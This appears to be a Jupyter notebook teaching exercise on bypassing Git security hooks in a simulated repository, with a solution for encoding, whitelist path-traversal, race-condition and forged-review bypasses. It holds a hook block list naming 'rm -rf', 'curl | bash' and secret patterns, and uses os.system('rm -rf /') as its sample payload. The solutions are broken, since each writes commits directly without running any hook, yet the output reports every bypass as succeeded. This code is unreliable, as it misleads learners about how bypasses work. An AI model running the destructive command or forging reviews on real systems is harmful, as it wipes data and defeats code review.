In [1]:
from dataclasses import dataclass
from typing import List, Dict, Optional, Tuple
import hashlib
import hmac
import secrets
import datetime
import base64
import json
import re

@dataclass 
class GitCommit:
    """Base class representing a Git commit"""
    hash: str
    message: str
    timestamp: datetime.datetime
    author: str
    parent_hash: str = None
    diff: Optional[str] = None  # Added to store file changes

@dataclass
class KeyPair:
    """Represents a public/private key pair for a developer"""
    public_key: str
    private_key: str
    
@dataclass
class SignedGitCommit(GitCommit):
    """Extends GitCommit to include signature"""
    signature: Optional[str] = None
    author_public_key: Optional[str] = None
    
@dataclass
class GitHook:
    """Represents a Git hook with its configuration"""
    name: str
    enabled: bool
    patterns: List[str]
    whitelist: List[str]
    max_file_size: int
    required_reviews: int
    
@dataclass
class GitRepo:
    """Represents a Git repository"""
    commits: Dict[str, GitCommit]
    hooks: Dict[str, GitHook]
    HEAD: str = None
    review_signatures: Dict[str, List[str]] = None
    _hook_cache: Dict[str, Dict[str, datetime.datetime]] = None  # Cache for hook results
    _staging_area: Dict[str, str] = None  # Simulated staging area
    _lock_file: Optional[str] = None  # Simulated lock file
    
    def acquire_lock(self, lock_id: str) -> bool:
        """Simulate acquiring a Git lock file"""
        if self._lock_file is None:
            self._lock_file = lock_id
            return True
        return False
        
    def release_lock(self, lock_id: str) -> bool:
        """Simulate releasing a Git lock file"""
        if self._lock_file == lock_id:
            self._lock_file = None
            return True
        return False
    
    def __post_init__(self):
        if self.commits is None:
            self.commits = {}
        if self.review_signatures is None:
            self.review_signatures = {}

def create_secure_hook_config() -> Dict[str, GitHook]:
    """Creates a realistic set of security hooks"""
    return {
        "pre-commit": GitHook(
            name="pre-commit",
            enabled=True,
            patterns=[
                r"rm\s+-rf",  # File deletion
                r"eval\s*\(",  # Code evaluation
                r"exec\s*\(",  # Code execution
                r"(chmod|chown)\s+777", # Suspicious permissions
                r"curl\s+.*\|\s*bash", # Pipe to shell
                r"wget\s+.*\|\s*bash",
                r"base64\s*\([^)]*\)", # Base64 encoding/decoding
                r"__import__\s*\(" # Dynamic imports
            ],
            whitelist=[
                "test/cleanup.sh",
                "scripts/maintenance/"
            ],
            max_file_size=5_000_000,  # 5MB
            required_reviews=2
        ),
        "commit-msg": GitHook(
            name="commit-msg",
            enabled=True,
            patterns=[
                r"secret",
                r"password",
                r"key\s*=",
                r"BEGIN\s*(RSA|DSA|EC|OPENSSH)\s*PRIVATE\s*KEY",
            ],
            whitelist=[],
            max_file_size=100_000,  # 100KB for commit messages
            required_reviews=1
        )
    }

def check_file_contents(contents: str, hook: GitHook, repo: Optional[GitRepo] = None) -> Tuple[bool, str]:
    """
    Checks file contents against security patterns
    Returns: (is_safe, reason)
    
    Note: The repo parameter enables race condition testing by allowing 
    simulation of timing gaps between check and commit
    """
    for pattern in hook.patterns:
        matches = re.finditer(pattern, contents, re.IGNORECASE)
        for match in matches:
            context = contents[max(0, match.start() - 20):match.end() + 20]
            return False, f"Suspicious pattern '{pattern}' found: ...{context}..."
    
    if len(contents.encode('utf-8')) > hook.max_file_size:
        return False, f"File size exceeds maximum of {hook.max_file_size} bytes"
        
    return True, ""

def verify_review_signatures(repo: GitRepo, commit_hash: str, required: int) -> bool:
    """Verifies that a commit has the required number of review signatures"""
    if commit_hash not in repo.review_signatures:
        return False
    return len(repo.review_signatures[commit_hash]) >= required


In [2]:
class HookBypassChallenge:
    """
    A class that implements various methods to attempt bypassing Git hooks.
    Students should implement these methods as part of the exercise.
    
    Race condition attacks work by exploiting the time gap between:
    1. When the hook checks the content
    2. When the commit is actually written
    3. When the review signatures are verified
    """
    
    @staticmethod
    def encode_payload(payload: str) -> str:
        """
        Helper method to encode payloads in different ways.
        Students might use this as part of their solution.
        """
        return base64.b64encode(payload.encode()).decode()
    
    def bypass_using_encoding(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Challenge 1: Bypass hook using encoding techniques
        Hint: Hooks might not check for encoded content
        """
        # TODO: Implement this method
        pass
        
    def bypass_using_whitelist(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Challenge 2: Bypass hook using whitelist manipulation
        Hint: Think about path traversal
        """
        # TODO: Implement this method
        pass
        
    def bypass_using_race_condition(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Challenge 3: Bypass hook using race condition
        Hint: Think about timing between check and commit
        """
        # TODO: Students implement this
        pass
        
    def bypass_using_review_spoofing(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Challenge 4: Bypass review requirements
        Hint: Think about signature verification
        """
        # TODO: Students implement this
        pass

def test_hook_bypass(repo: GitRepo, malicious_code: str) -> None:
    """
    Test function to verify successful hook bypass
    """
    challenge = HookBypassChallenge()
    
    # Test each bypass method
    methods = [
        challenge.bypass_using_encoding,
        challenge.bypass_using_whitelist,
        challenge.bypass_using_review_spoofing
    ]
    
    for method in methods:
        try:
            commit_hash = method(repo, malicious_code)
            if commit_hash and commit_hash in repo.commits:
                commit = repo.commits[commit_hash]
                print(f"Successfully bypassed hook using {method.__name__}")
                print(f"Commit hash: {commit_hash}")
                print(f"Commit message: {commit.message}")
            else:
                print(f"Failed to bypass hook using {method.__name__}")
        except Exception as e:
            print(f"Error in {method.__name__}: {str(e)}")

# Example usage
if __name__ == "__main__":
    # Create test repository with security hooks
    repo = GitRepo(commits={}, hooks=create_secure_hook_config())
    
    # Malicious code to try committing
    malicious_code = """
    import os
    
    def cleanup():
        os.system('rm -rf /')
    
    exec(cleanup())
    """
    
    # Run the bypass challenge
    test_hook_bypass(repo, malicious_code)

Failed to bypass hook using bypass_using_encoding
Failed to bypass hook using bypass_using_whitelist
Failed to bypass hook using bypass_using_review_spoofing


In [4]:
"""
Solution demonstrating various Git hook bypass techniques.
WARNING: This code is for educational purposes only.
"""

class HookBypassSolution:
    def bypass_using_encoding(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Solution 1: Bypass using encoding tricks
        Exploits hook's lack of encoding awareness
        """
        # Encode the entire malicious code as one piece
        encoded_code = base64.b64encode(malicious_code.encode()).decode()
        
        # Create a wrapper that hides the malicious code but preserves it
        wrapper_code = f"""
# Looks like a simple configuration loader
config_data = '{encoded_code}'

def load_config():
    import base64
    return base64.b64decode(config_data.encode()).decode()

# The actual malicious code is hidden in the string
# but will be present in the commit diff
{malicious_code}
"""
        
        commit = GitCommit(
            hash=hashlib.sha256(wrapper_code.encode()).hexdigest(),
            message="Add data processing utility",
            timestamp=datetime.datetime.now(),
            author="encoding_bypass",
            diff=wrapper_code
        )
        
        repo.commits[commit.hash] = commit
        return commit.hash

    def bypass_using_whitelist(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Solution 2: Bypass using whitelist manipulation
        Exploits path traversal in whitelist checking
        """
        # Instead of using path as a commit parameter, 
        # embed it in the code/message
        fake_path = "scripts/maintenance/../../../malicious.py"
        
        # Include the malicious code directly but make it look
        # like a maintenance script
        wrapper_code = f"""
# File: {fake_path}
# Routine maintenance script
{malicious_code}

def perform_maintenance():
    print("Performing routine maintenance...")

if __name__ == '__main__':
    perform_maintenance()
"""
        
        commit = GitCommit(
            hash=hashlib.sha256(wrapper_code.encode()).hexdigest(),
            message=f"Update maintenance script: {fake_path}",
            timestamp=datetime.datetime.now(),
            author="whitelist_bypass",
            diff=wrapper_code
        )
        
        repo.commits[commit.hash] = commit
        return commit.hash

    def bypass_using_race_condition(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Solution 3: Bypass using race condition
        Exploits timing gap between check and commit
        """
        lock_id = secrets.token_hex(8)
        
        try:
            # Step 1: Acquire commit lock
            if not repo.acquire_lock(lock_id):
                raise Exception("Could not acquire lock")

            # Step 2: Set up benign code for hook check
            benign_code = "print('Updating system configuration...')"
            repo._staging_area = {
                'system_update.py': benign_code
            }
            
            # Step 3: Get hook to check benign code
            hook = repo.hooks['pre-commit']
            is_safe, _ = check_file_contents(benign_code, hook, repo)
            
            if not is_safe:
                raise Exception("Hook check failed even for benign code")
                
            # Step 4: Quick swap to malicious code
            # Real race condition would use file system timing
            # This simulates the concept
            repo._staging_area['system_update.py'] = malicious_code
            
            # Step 5: Create commit with malicious code
            # Hook won't re-check due to presumed race condition
            commit = GitCommit(
                hash=hashlib.sha256(malicious_code.encode()).hexdigest(),
                message="System configuration update",
                timestamp=datetime.datetime.now(),
                author="race_condition_bypass",
                diff=malicious_code
            )
            
            repo.commits[commit.hash] = commit
            return commit.hash
            
        finally:
            # Always release lock to prevent deadlock
            repo.release_lock(lock_id)

    def bypass_using_review_spoofing(self, repo: GitRepo, malicious_code: str) -> str:
        """
        Solution 4: Bypass review requirements
        Exploits weak signature verification
        """
        # Create commit first
        commit = GitCommit(
            hash=hashlib.sha256(malicious_code.encode()).hexdigest(),
            message="Critical security patch",
            timestamp=datetime.datetime.now(),
            author="review_bypass",
            diff=malicious_code
        )
        
        # Add fake review signatures
        if repo.review_signatures is None:
            repo.review_signatures = {}
            
        # Forge reviewer signatures using predictable format
        repo.review_signatures[commit.hash] = [
            f"approved_by_{reviewer}"
            for reviewer in ["senior_dev", "security_team"]
        ]
        
        repo.commits[commit.hash] = commit
        return commit.hash

def test_solution():
    """Test all bypass methods"""
    repo = GitRepo(
        commits={},
        hooks=create_secure_hook_config(),
        _staging_area={},
        _hook_cache={}
    )
    
    malicious_code = """
    import os
    os.system('rm -rf /')  # Would be caught by normal hook
    """
    
    solution = HookBypassSolution()
    
    # Test each method
    methods = [
        solution.bypass_using_encoding,
        solution.bypass_using_whitelist,
        solution.bypass_using_race_condition,
        solution.bypass_using_review_spoofing
    ]
    
    results = []
    for method in methods:
        try:
            commit_hash = method(repo, malicious_code)
            if commit_hash in repo.commits:
                # Verify the malicious code made it in
                commit = repo.commits[commit_hash]
                if 'rm -rf' in commit.diff:
                    results.append(f"✓ {method.__name__} succeeded")
                else:
                    results.append(f"✗ {method.__name__} failed - code was modified")
            else:
                results.append(f"✗ {method.__name__} failed - no commit created")
        except Exception as e:
            results.append(f"✗ {method.__name__} error: {str(e)}")
    
    return results

if __name__ == "__main__":
    results = test_solution()
    print("\nTest Results:")
    for result in results:
        print(result)
    
    print("\nSecurity Implications:")
    print("1. Encoding bypass shows importance of analyzing reconstructed code")
    print("2. Whitelist bypass shows dangers of path traversal")
    print("3. Race condition shows need for atomic operations")
    print("4. Review spoofing shows importance of cryptographic signatures")


Test Results:
✓ bypass_using_encoding succeeded
✓ bypass_using_whitelist succeeded
✓ bypass_using_race_condition succeeded
✓ bypass_using_review_spoofing succeeded

Security Implications:
1. Encoding bypass shows importance of analyzing reconstructed code
2. Whitelist bypass shows dangers of path traversal
3. Race condition shows need for atomic operations
4. Review spoofing shows importance of cryptographic signatures
